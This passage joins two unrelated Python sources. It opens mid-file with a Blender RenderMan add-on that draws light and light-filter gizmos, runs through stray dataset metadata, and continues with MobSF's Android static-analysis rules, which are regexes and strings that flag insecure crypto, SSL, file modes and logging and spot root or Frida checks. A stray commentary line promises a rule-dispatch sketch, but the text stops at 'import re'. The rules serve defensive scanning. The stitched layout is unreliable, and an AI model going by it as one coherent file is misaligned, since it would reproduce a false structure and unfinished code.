s_rmanLightLogo['R_outside']: R_outside.append( m @ Vector(pt)) R_outside_indices = _get_indices(s_rmanLightLogo['R_outside']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices) batch.draw(_SHADER_) R_inside = [] for pt in s_rmanLightLogo['R_inside']: R_inside.append( m @ Vector(pt)) R_inside_indices = _get_indices(s_rmanLightLogo['R_inside']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices) batch.draw(_SHADER_) def draw_dist_light(ob): _SHADER_.bind() set_selection_color(ob) ob_matrix = Matrix(ob.matrix_world) m = ob_matrix @ Matrix.Rotation(math.radians(180.0), 4, 'Y') arrow1 = [] for pt in s_distantLight['arrow1']: arrow1.append( m @ Vector(pt) ) arrow1_indices = _get_indices(s_distantLight['arrow1']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow1}, indices=arrow1_indices) batch.draw(_SHADER_) arrow2 = [] for pt in s_distantLight['arrow2']: arrow2.append( m @ Vector(pt)) arrow2_indices = _get_indices(s_distantLight['arrow2']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow2}, indices=arrow2_indices) batch.draw(_SHADER_) arrow3 = [] for pt in s_distantLight['arrow3']: arrow3.append( m @ Vector(pt) ) arrow3_indices = _get_indices(s_distantLight['arrow3']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow3}, indices=arrow3_indices) batch.draw(_SHADER_) m = ob_matrix R_outside = [] for pt in s_rmanLightLogo['R_outside']: R_outside.append( m @ Vector(pt) ) R_outside_indices = _get_indices(s_rmanLightLogo['R_outside']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices) batch.draw(_SHADER_) R_inside = [] for pt in s_rmanLightLogo['R_inside']: R_inside.append( m @ Vector(pt) ) R_inside_indices = _get_indices(s_rmanLightLogo['R_inside']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices) batch.draw(_SHADER_) def draw_portal_light(ob): 
_SHADER_.bind() set_selection_color(ob) ob_matrix = Matrix(ob.matrix_world) m = ob_matrix R_outside = [] for pt in s_rmanLightLogo['R_outside']: R_outside.append( m @ Vector(pt) ) R_outside_indices = _get_indices(s_rmanLightLogo['R_outside']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices) batch.draw(_SHADER_) R_inside = [] for pt in s_rmanLightLogo['R_inside']: R_inside.append( m @ Vector(pt)) R_inside_indices = _get_indices(s_rmanLightLogo['R_inside']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices) batch.draw(_SHADER_) m = ob_matrix @ Matrix.Rotation(math.radians(90.0), 4, 'X') m = m @ Matrix.Scale(0.5, 4) rays = [] for pt in s_portalRays: rays.append( m @ Vector(pt) ) rays_indices = _get_indices(s_portalRays) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": rays}, indices=rays_indices) batch.draw(_SHADER_) def draw_dome_light(ob): _SHADER_.bind() set_selection_color(ob) loc, rot, sca = Matrix(ob.matrix_world).decompose() axis,angle = rot.to_axis_angle() m = Matrix.Rotation(angle, 4, axis) m = m @ Matrix.Scale(100, 4) sphere = make_sphere(m) sphere_indices = [] for i in range(0, len(sphere)): if i == len(sphere)-1: sphere_indices.append((i, 0)) else: sphere_indices.append((i, i+1)) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": sphere}, indices=sphere_indices) batch.draw(_SHADER_) def draw_cylinder_light(ob): _SHADER_.bind() set_selection_color(ob) m = Matrix(ob.matrix_world) cylinder = [] for pt in s_cylinderLight['vtx']: cylinder.append( m @ Vector(pt)) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": cylinder}, indices=s_cylinderLight['indices']) batch.draw(_SHADER_) def draw_arc(a, b, numSteps, quadrant, xOffset, yOffset, pts): stepAngle = float(_PI0_5_ / numSteps) for i in range(0, numSteps): angle = stepAngle*i + quadrant*_PI0_5_ x = a * math.cos(angle) y = b * math.sin(angle) pts.append(Vector([x+xOffset, y+yOffset, 0.0])) #pts.append(Vector([x+xOffset, 0.0, y+yOffset])) def draw_rounded_rectangles( left, right, top, bottom, radius, leftEdge, rightEdge, topEdge, bottomEdge, zOffset1, zOffset2, m): pts = [] a = radius+rightEdge b = radius+topEdge draw_arc(a, b, 10, 0, right, top, pts) a = radius+leftEdge b = radius+topEdge draw_arc(a, b, 10, 1, -left, top, pts) a = radius+leftEdge b = radius+bottomEdge draw_arc(a, b, 10, 2, -left, -bottom, pts) a = radius+rightEdge b = radius+bottomEdge draw_arc(a, b, 10, 3, right, -bottom, pts) translate = m #Matrix.Translation( Vector([0,0, zOffset1])) @ m shape_pts = [] for pt in pts: shape_pts.append( translate @ Vector(pt)) shape_pts_indices = _get_indices(shape_pts) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": shape_pts}, indices=shape_pts_indices) batch.draw(_SHADER_) shape_pts = [] translate = m #Matrix.Translation( Vector([0,0, zOffset2])) @ m for pt in pts: shape_pts.append( translate @ Vector(pt) ) shape_pts_indices = _get_indices(shape_pts) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": shape_pts}, indices=shape_pts_indices) batch.draw(_SHADER_) def draw_rod(leftEdge, rightEdge, topEdge, bottomEdge, frontEdge, backEdge, scale, width, radius, left, right, top, bottom, front, back, world_mat): leftEdge *= scale rightEdge *= scale topEdge *= scale backEdge *= scale frontEdge *= scale bottomEdge *= scale m = world_mat # front and back draw_rounded_rectangles(left, right, top, bottom, radius, leftEdge, rightEdge, topEdge, bottomEdge, front, -back, m) m = world_mat @ Matrix.Rotation(math.radians(-90.0), 4, 'X') # top and bottom 
draw_rounded_rectangles(left, right, back, front, radius, leftEdge, rightEdge, backEdge, frontEdge, top, -bottom, m) m = world_mat @ Matrix.Rotation(math.radians(90.0), 4, 'Y') # left and right draw_rounded_rectangles(front, back, top, bottom, radius, frontEdge, backEdge, topEdge, bottomEdge, -left, right, m) def draw_rod_light_filter(ob): _SHADER_.bind() set_selection_color(ob) m = Matrix(ob.matrix_world) m = m @ Matrix.Rotation(math.radians(90.0), 4, 'X') m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Y') #m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y') #m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z') light = ob.data rm = light.renderman.get_light_node() edge = rm.edge width = rm.width depth = rm.depth height = rm.height radius = rm.radius left_edge = edge right_edge = edge top_edge = edge bottom_edge = edge front_edge = edge back_edge = edge left = 0.0 right = 0.0 top = 0.0 bottom = 0.0 front = 0.0 back = 0.0 scale_width = 1.0 scale_height = 1.0 scale_depth = 1.0 rod_scale = 0.0 if light.renderman.get_light_node_name() == 'PxrRodLightFilter': left_edge *= rm.leftEdge right_edge *= rm.rightEdge top_edge *= rm.topEdge bottom_edge *= rm.bottomEdge front_edge *= rm.frontEdge back_edge *= rm.backEdge scale_width *= rm.scaleWidth scale_height *= rm.scaleHeight scale_depth *= rm.scaleDepth left = rm.left right = rm.right top = rm.top bottom = rm.bottom front = rm.front back = rm.back left += scale_width * width right += scale_width * width top += scale_height * height bottom += scale_height * height front += scale_depth * depth back += scale_depth * depth draw_rod(left_edge, right_edge, top_edge, bottom_edge, front_edge, back_edge, rod_scale, width, radius, left, right, top, bottom, front, back, m) if edge > 0.0: # draw outside box rod_scale = 1.0 draw_rod(left_edge, right_edge, top_edge, bottom_edge, front_edge, back_edge, rod_scale, width, radius, left, right, top, bottom, front, back, m) def draw_ramp_light_filter(ob): _SHADER_.bind() set_selection_color(ob) light = ob.data rm = light.renderman.get_light_node() rampType = int(rm.rampType) begin = float(rm.beginDist) end = float(rm.endDist) # distToLight if rampType in (0,2): _SHADER_.bind() set_selection_color(ob) m = Matrix(ob.matrix_world) m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y') m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z') # begin begin_m = m @ Matrix.Scale(begin, 4) disk = [] for pt in s_diskLight: disk.append( begin_m @ Vector(pt) ) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) m2 = begin_m @ Matrix.Rotation(math.radians(90.0), 4, 'Y') disk = [] for pt in s_diskLight: disk.append( m2 @ Vector(pt)) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) m3 = begin_m @ Matrix.Rotation(math.radians(90.0), 4, 'X') disk = [] for pt in s_diskLight: disk.append( m3 @ Vector(pt)) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) # end end_m = m @ Matrix.Scale(end, 4) disk = [] for pt in s_diskLight: disk.append( end_m @ Vector(pt)) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) m2 = end_m @ Matrix.Rotation(math.radians(90.0), 4, 'Y') disk = [] for pt in s_diskLight: disk.append( m2 @ Vector(pt)) disk_indices = _get_indices(s_diskLight) batch = 
batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) m3 = end_m @ Matrix.Rotation(math.radians(90.0), 4, 'X') disk = [] for pt in s_diskLight: disk.append( m3 @ Vector(pt)) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) # linear elif rampType == 1: m = Matrix(ob.matrix_world) m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y') m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z') box = [] for pt in s_rmanLightLogo['box']: box.append( m @ Vector(pt)) n = mathutils.geometry.normal(box) n.normalize() box1 = [] for i,pt in enumerate(box): if begin > 0.0: box1.append(pt + (begin * n)) else: box1.append(pt) box_indices = _get_indices(s_rmanLightLogo['box']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": box1}, indices=box_indices) batch.draw(_SHADER_) box2 = [] for pt in box: box2.append( pt + (end * n) ) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": box2}, indices=box_indices) batch.draw(_SHADER_) # radial elif rampType == 3: _SHADER_.bind() set_selection_color(ob) m = Matrix(ob.matrix_world) m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y') m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z') if begin > 0.0: m1 = m @ Matrix.Scale(begin, 4) disk = [] for pt in s_diskLight: disk.append( m1 @ Vector(pt) ) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) m2 = m @ Matrix.Scale(end, 4) disk = [] for pt in s_diskLight: disk.append( m2 @ Vector(pt)) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) else: pass def draw_barn_light_filter(ob): global _BARN_LIGHT_DRAW_HELPER_ _SHADER_.bind() m = Matrix(ob.matrix_world) m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y') #m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z') set_selection_color(ob) if not _BARN_LIGHT_DRAW_HELPER_: _BARN_LIGHT_DRAW_HELPER_ = BarnLightFilterDrawHelper() _BARN_LIGHT_DRAW_HELPER_.update_input_params(ob) vtx_buffer = _BARN_LIGHT_DRAW_HELPER_.vtx_buffer() pts = [] for pt in vtx_buffer: pts.append( m @ Vector(pt)) indices = _BARN_LIGHT_DRAW_HELPER_.idx_buffer(len(pt), 0, 0) # blender wants a list of lists indices = [indices[i:i+2] for i in range(0, len(indices), 2)] batch = batch_for_shader(_SHADER_, 'LINES', {"pos": pts}, indices=indices) batch.draw(_SHADER_) def draw(): if bpy.context.engine != 'PRMAN_RENDER': return scene = bpy.context.scene for ob in [x for x in scene.objects if x.type == 'LIGHT']: if ob.hide_get(): continue if not ob.data.renderman: continue rm = ob.data.renderman if not rm.use_renderman_node: continue light_shader = rm.get_light_node() if not light_shader: continue # check the local view for this light if not ob.visible_in_viewport_get(bpy.context.space_data): continue light_shader_name = rm.get_light_node_name() if light_shader_name == '': return if light_shader_name in RMAN_AREA_LIGHT_TYPES: if ob.data.type != 'AREA': if hasattr(ob.data, 'size'): ob.data.size = 0.0 ob.data.type = 'AREA' elif ob.data.type != 'POINT': if hasattr(ob.data, 'size'): ob.data.size = 0.0 ob.data.type = 'POINT' if light_shader_name == 'PxrSphereLight': draw_sphere_light(ob) elif light_shader_name == 'PxrEnvDayLight': draw_envday_light(ob) elif light_shader_name == 'PxrDiskLight': draw_disk_light(ob) elif light_shader_name == 'PxrDistantLight': draw_dist_light(ob) elif light_shader_name == 
'PxrPortalLight': draw_portal_light(ob) elif light_shader_name == 'PxrDomeLight': draw_dome_light(ob) elif light_shader_name == 'PxrCylinderLight': draw_cylinder_light(ob) elif light_shader_name in ['PxrGoboLightFilter', 'PxrCookieLightFilter', 'PxrRectLight']: draw_rect_light(ob) elif light_shader_name in ['PxrRodLightFilter', 'PxrBlockerLightFilter']: draw_rod_light_filter(ob) elif light_shader_name == 'PxrRampLightFilter': draw_ramp_light_filter(ob) elif light_shader_name == 'PxrBarnLightFilter': # get all lights that the barn is attached to draw_barn_light_filter(ob) else: draw_sphere_light(ob) def register(): global _DRAW_HANDLER_ _DRAW_HANDLER_ = bpy.types.SpaceView3D.draw_handler_add(draw, (), 'WINDOW', 'POST_VIEW') def unregister(): global _DRAW_HANDLER_ if _DRAW_HANDLER_: bpy.types.SpaceView3D.draw_handler_remove(_DRAW_HANDLER_, 'WINDOW')
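Each gizmo in this module follows one pattern: transform a template point list into world space with the object matrix, pair points into edge indices, and draw a 'LINES' batch. Below is a minimal sketch of that pattern, assuming the Blender 2.8x gpu_extras API the module targets; `_get_indices` is called above but not defined in this excerpt, so the consecutive-pair implementation here is an assumption (draw_dome_light builds its wrap-around index list inline, which suggests `_get_indices` leaves polylines open):

from gpu_extras.batch import batch_for_shader
from mathutils import Matrix, Vector

def _get_indices(pts):
    # Pair consecutive vertices into open-polyline segments: (0,1), (1,2), ...
    return [(i, i + 1) for i in range(len(pts) - 1)]

def draw_polyline(shader, ob, template_pts):
    m = Matrix(ob.matrix_world)
    pts = [m @ Vector(p) for p in template_pts]  # object space -> world space
    batch = batch_for_shader(shader, 'LINES', {"pos": pts},
                             indices=_get_indices(pts))
    batch.draw(shader)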
mit
8,597,294,281,433,653,000
30.923304
186
0.543777
false
2.626221
false
false
false
ajinabraham/Mobile-Security-Framework-MobSF
StaticAnalyzer/views/android/android_rules.py
1
19226
""" Rule Format 1. desc - Description of the findings 2. type a. string b. regex 3. match a. single_regex - if re.findall(regex1, input) b .regex_and - if re.findall(regex1, input) and re.findall(regex2, input) c. regex_or - if re.findall(regex1, input) or re.findall(regex2, input) d. regex_and_perm - if re.findall(regex, input) and (permission in permission_list_from_manifest) e. single_string - if string1 in input f. string_and - if (string1 in input) and (string2 in input) g. string_or - if (string1 in input) or (string2 in input) h. string_and_or - if (string1 in input) and ((string_or1 in input) or (string_or2 in input)) i. string_or_and - if (string1 in input) or ((string_and1 in input) and (string_and2 in input)) j. string_and_perm - if (string1 in input) and (permission in permission_list_from_manifest) k. string_or_and_perm - if ((string1 in input) or (string2 in input)) and (permission in permission_list_from_manifest) 4. level a. high b. warning c. info d. good 5. input_case a. upper b. lower c. exact 6. others a. string<no> - string1, string2, string3, string_or1, string_and1 b. regex<no> - regex1, regex2, regex3 c. perm - Permission """ RULES = [ { 'desc': 'Files may contain hardcoded sensitive informations like usernames, passwords, keys etc.', 'type': 'regex', 'regex1': r'''(password\s*=\s*['|"].+['|"]\s{0,5})|(pass\s*=\s*['|"].+['|"]\s{0,5})|(username\s*=\s*['|"].+['|"]\s{0,5})|(secret\s*=\s*['|"].+['|"]\s{0,5})|(key\s*=\s*['|"].+['|"]\s{0,5})''', 'level': 'high', 'match': 'single_regex', 'input_case': 'lower', 'cvss': 7.4, 'cwe': 'CWE-312' }, { 'desc': 'IP Address disclosure', 'type': 'regex', 'regex1': r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', 'level': 'warning', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 4.3, 'cwe': 'CWE-200' }, { 'desc': 'Hidden elements in view can be used to hide data from user. But this data can be leaked', 'type': 'regex', 'regex1': r'setVisibility\(View\.GONE\)|setVisibility\(View\.INVISIBLE\)', 'level': 'high', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 4.3, 'cwe': 'CWE-919' }, { 'desc': 'The App uses ECB mode in Cryptographic encryption algorithm. ECB mode is known to be weak as it results in the same ciphertext for identical blocks of plaintext.', 'type': 'regex', 'regex1': r'Cipher\.getInstance\(\s*"\s*AES\/ECB', 'level': 'high', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 5.9, 'cwe': 'CWE-327' }, { 'desc': 'This App uses RSA Crypto without OAEP padding. The purpose of the padding scheme is to prevent a number of attacks on RSA that only work when the encryption is performed without padding.', 'type': 'regex', 'regex1': r'cipher\.getinstance\(\s*"rsa/.+/nopadding', 'level': 'high', 'match': 'single_regex', 'input_case': 'lower', 'cvss': 5.9, 'cwe': 'CWE-780' }, { 'desc': 'Insecure Implementation of SSL. Trusting all the certificates or accepting self signed certificates is a critical Security Hole. This application is vulnerable to MITM attacks', 'type': 'regex', 'regex1': r'javax\.net\.ssl', 'regex2': r'TrustAllSSLSocket-Factory|AllTrustSSLSocketFactory|NonValidatingSSLSocketFactory|net\.SSLCertificateSocketFactory|ALLOW_ALL_HOSTNAME_VERIFIER|\.setDefaultHostnameVerifier\(|NullHostnameVerifier\(', 'level': 'high', 'match': 'regex_and', 'input_case': 'exact', 'cvss': 7.4, 'cwe': 'CWE-295' }, { 'desc': 'WebView load files from external storage. 
Files in external storage can be modified by any application.', 'type': 'regex', 'regex1': r'\.loadUrl\(.*getExternalStorageDirectory\(', 'regex2': r'webkit\.WebView', 'level': 'high', 'match': 'regex_and', 'input_case': 'exact', 'cvss': 5.0, 'cwe': 'CWE-919' }, { 'desc': 'The file is World Readable. Any App can read from the file', 'type': 'regex', 'regex1': r'MODE_WORLD_READABLE|Context\.MODE_WORLD_READABLE', 'regex2': r'openFileOutput\(\s*".+"\s*,\s*1\s*\)', 'level': 'high', 'match': 'regex_or', 'input_case': 'exact', 'cvss': 4.0, 'cwe': 'CWE-276' }, { 'desc': 'The file is World Writable. Any App can write to the file', 'type': 'regex', 'regex1': r'MODE_WORLD_WRITABLE|Context\.MODE_WORLD_WRITABLE', 'regex2': r'openFileOutput\(\s*".+"\s*,\s*2\s*\)', 'level': 'high', 'match': 'regex_or', 'input_case': 'exact', 'cvss': 6.0, 'cwe': 'CWE-276' }, { 'desc': 'The file is World Readable and Writable. Any App can read/write to the file', 'type': 'regex', 'regex1': r'openFileOutput\(\s*".+"\s*,\s*3\s*\)', 'level': 'high', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 6.0, 'cwe': 'CWE-276' }, { 'desc': 'Weak Hash algorithm used', 'type': 'regex', 'regex1': r'getInstance(\"md4\")|getInstance(\"rc2\")|getInstance(\"rc4\")|getInstance(\"RC4\")|getInstance(\"RC2\")|getInstance(\"MD4\")', 'level': 'high', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 7.4, 'cwe': 'CWE-327' }, { 'desc': 'MD5 is a weak hash known to have hash collisions.', 'type': 'regex', 'regex1': r'MessageDigest\.getInstance\(\"*MD5\"*\)|MessageDigest\.getInstance\(\"*md5\"*\)|DigestUtils\.md5\(', 'level': 'high', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 7.4, 'cwe': 'CWE-327' }, { 'desc': 'SHA-1 is a weak hash known to have hash collisions.', 'type': 'regex', 'regex1': r'MessageDigest\.getInstance\(\"*SHA-1\"*\)|MessageDigest\.getInstance\(\"*sha-1\"*\)|DigestUtils\.sha\(', 'level': 'high', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 5.9, 'cwe': 'CWE-327' }, { 'desc': 'App can write to App Directory. Sensitive Information should be encrypted.', 'type': 'regex', 'regex1': r'MODE_PRIVATE|Context\.MODE_PRIVATE', 'level': 'info', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 3.9, 'cwe': 'CWE-276' }, { 'desc': 'The App uses an insecure Random Number Generator.', 'type': 'regex', 'regex1': r'java\.util\.Random', 'level': 'high', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 7.5, 'cwe': 'CWE-330' }, { 'desc': 'The App logs information. Sensitive information should never be logged.', 'type': 'regex', 'regex1': r'Log\.(v|d|i|w|e|f|s)|System\.out\.print|System\.err\.print', 'level': 'info', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 7.5, 'cwe': 'CWE-532' }, { 'desc': 'This App uses Java Hash Code. It\'s a weak hash function and should never be used in Secure Crypto Implementation.', 'type': 'string', 'string1': '.hashCode()', 'level': 'high', 'match': 'single_string', 'input_case': 'exact', 'cvss': 4.3, 'cwe': 'CWE-327' }, { 'desc': 'These activities prevent screenshot when they go to background.', 'type': 'string', 'string1': 'LayoutParams.FLAG_SECURE', 'level': 'good', 'match': 'single_string', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'This App uses SQL Cipher. 
But the secret may be hardcoded.', 'type': 'string', 'string1': 'SQLiteOpenHelper.getWritableDatabase(', 'level': 'warning', 'match': 'single_string', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'This app has capabilities to prevent tapjacking attacks.', 'type': 'string', 'string1': 'setFilterTouchesWhenObscured(true)', 'level': 'good', 'match': 'single_string', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'App can read/write to External Storage. Any App can read data written to External Storage.', 'perm': 'android.permission.WRITE_EXTERNAL_STORAGE', 'type': 'string', 'string1': '.getExternalStorage', 'string2': '.getExternalFilesDir(', 'level': 'high', 'match': 'string_or_and_perm', 'input_case': 'exact', 'cvss': 5.5, 'cwe': 'CWE-276' }, { 'desc': 'App creates temp file. Sensitive information should never be written into a temp file.', 'perm': 'android.permission.WRITE_EXTERNAL_STORAGE', 'type': 'string', 'string1': '.createTempFile(', 'level': 'high', 'match': 'string_and_perm', 'input_case': 'exact', 'cvss': 5.5, 'cwe': 'CWE-276' }, { 'desc': 'Insecure WebView Implementation. Execution of user controlled code in WebView is a critical Security Hole.', 'type': 'string', 'string1': 'setJavaScriptEnabled(true)', 'string2': '.addJavascriptInterface(', 'level': 'warning', 'match': 'string_and', 'input_case': 'exact', 'cvss': 8.8, 'cwe': 'CWE-749' }, { 'desc': 'This App uses SQL Cipher. SQLCipher provides 256-bit AES encryption to sqlite database files.', 'type': 'string', 'string1': 'SQLiteDatabase.loadLibs(', 'string2': 'net.sqlcipher.', 'level': 'info', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'This App download files using Android Download Manager', 'type': 'string', 'string1': 'android.app.DownloadManager', 'string2': 'getSystemService(DOWNLOAD_SERVICE)', 'level': 'high', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'This App use Realm Database with encryption.', 'type': 'string', 'string1': 'io.realm.Realm', 'string2': '.encryptionKey(', 'level': 'good', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'The App may use weak IVs like "0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00" or "0x01,0x02,0x03,0x04,0x05,0x06,0x07". Not using a random IV makes the resulting ciphertext much more predictable and susceptible to a dictionary attack.', 'type': 'string', 'string1': '0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00', 'string2': '0x01,0x02,0x03,0x04,0x05,0x06,0x07', 'level': 'high', 'match': 'string_or', 'input_case': 'exact', 'cvss': 9.8, 'cwe': 'CWE-329' }, { 'desc': 'Remote WebView debugging is enabled.', 'type': 'string', 'string1': '.setWebContentsDebuggingEnabled(true)', 'string2': 'WebView', 'level': 'high', 'match': 'string_and', 'input_case': 'exact', 'cvss': 5.4, 'cwe': 'CWE-919' }, { 'desc': 'This app listens to Clipboard changes. Some malwares also listen to Clipboard changes.', 'type': 'string', 'string1': 'content.ClipboardManager', 'string2': 'OnPrimaryClipChangedListener', 'level': 'warning', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'This App copies data to clipboard. Sensitive data should not be copied to clipboard as other applications can access it.', 'type': 'string', 'string1': 'content.ClipboardManager', 'string2': 'setPrimaryClip(', 'level': 'info', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'Insecure WebView Implementation. 
WebView ignores SSL Certificate errors and accept any SSL Certificate. This application is vulnerable to MITM attacks', 'type': 'string', 'string1': 'onReceivedSslError(WebView', 'string2': '.proceed();', 'level': 'high', 'match': 'string_and', 'input_case': 'exact', 'cvss': 7.4, 'cwe': 'CWE-295' }, { 'desc': 'App uses SQLite Database and execute raw SQL query. Untrusted user input in raw SQL queries can cause SQL Injection. Also sensitive information should be encrypted and written to the database.', 'type': 'string', 'string1': 'android.database.sqlite', 'string_or1': 'rawQuery(', 'string_or2': 'execSQL(', 'level': 'high', 'match': 'string_and_or', 'input_case': 'exact', 'cvss': 5.9, 'cwe': 'CWE-89' }, { 'desc': 'This App detects frida server.', 'type': 'string', 'string1': 'fridaserver', 'string_or1': '27047', 'string_or2': 'REJECT', 'string_or3': 'LIBFRIDA', 'level': 'good', 'match': 'string_and_or', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'This App uses an SSL Pinning Library (org.thoughtcrime.ssl.pinning) to prevent MITM attacks in secure communication channel.', 'type': 'string', 'string1': 'org.thoughtcrime.ssl.pinning', 'string_or1': 'PinningHelper.getPinnedHttpsURLConnection', 'string_or2': 'PinningHelper.getPinnedHttpClient', 'string_or3': 'PinningSSLSocketFactory(', 'level': 'good', 'match': 'string_and_or', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'This App has capabilities to prevent against Screenshots from Recent Task History/ Now On Tap etc.', 'type': 'string', 'string1': '.FLAG_SECURE', 'string_or1': 'getWindow().setFlags(', 'string_or2': 'getWindow().addFlags(', 'level': 'high', 'match': 'string_and_or', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'DexGuard Debug Detection code to detect wheather an App is debuggable or not is identified.', 'type': 'string', 'string1': 'import dexguard.util', 'string2': 'DebugDetector.isDebuggable', 'level': 'good', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'DexGuard Debugger Detection code is identified.', 'type': 'string', 'string1': 'import dexguard.util', 'string2': 'DebugDetector.isDebuggerConnected', 'level': 'good', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'DexGuard Emulator Detection code is identified.', 'type': 'string', 'string1': 'import dexguard.util', 'string2': 'EmulatorDetector.isRunningInEmulator', 'level': 'good', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'DecGuard code to detect wheather the App is signed with a debug key or not is identified.', 'type': 'string', 'string1': 'import dexguard.util', 'string2': 'DebugDetector.isSignedWithDebugKey', 'level': 'good', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'DexGuard Root Detection code is identified.', 'type': 'string', 'string1': 'import dexguard.util', 'string2': 'RootDetector.isDeviceRooted', 'level': 'good', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'DexGuard App Tamper Detection code is identified.', 'type': 'string', 'string1': 'import dexguard.util', 'string2': 'TamperDetector.checkApk', 'level': 'good', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'DexGuard Signer Certificate Tamper Detection code is identified.', 'type': 'string', 'string1': 'import dexguard.util', 'string2': 'TCertificateChecker.checkCertificate', 'level': 'good', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': 
'' }, { 'desc': 'The App may use package signature for tamper detection.', 'type': 'string', 'string1': 'PackageManager.GET_SIGNATURES', 'string2': 'getPackageName(', 'level': 'good', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'This App uses SafetyNet API.', 'type': 'string', 'string1': 'com.google.android.gms.safetynet.SafetyNetApi', 'level': 'good', 'match': 'single_string', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'This App may request root (Super User) privileges.', 'type': 'string', 'string1': 'com.noshufou.android.su', 'string2': 'com.thirdparty.superuser', 'string3': 'eu.chainfire.supersu', 'string4': 'com.koushikdutta.superuser', 'string5': 'eu.chainfire.', 'level': 'high', 'match': 'string_or', 'input_case': 'exact', 'cvss': 0, 'cwe': 'CWE-250' }, { 'desc': 'This App may have root detection capabilities.', 'type': 'string', 'string1': '.contains("test-keys")', 'string2': '/system/app/Superuser.apk', 'string3': 'isDeviceRooted()', 'string4': '/system/bin/failsafe/su', 'string5': '/system/sd/xbin/su', 'string6': '"/system/xbin/which", "su"', "string7": 'RootTools.isAccessGiven()', 'level': 'good', 'match': 'string_or', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }]
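The docstring at the top of this file documents the match strategies declaratively; the analyzer that consumes RULES lives elsewhere in MobSF. The following is only a sketch of how a few of those strategies could be dispatched over one decompiled source file. The file path and empty permission list are placeholders, and only a subset of the documented strategies is handled:

import re

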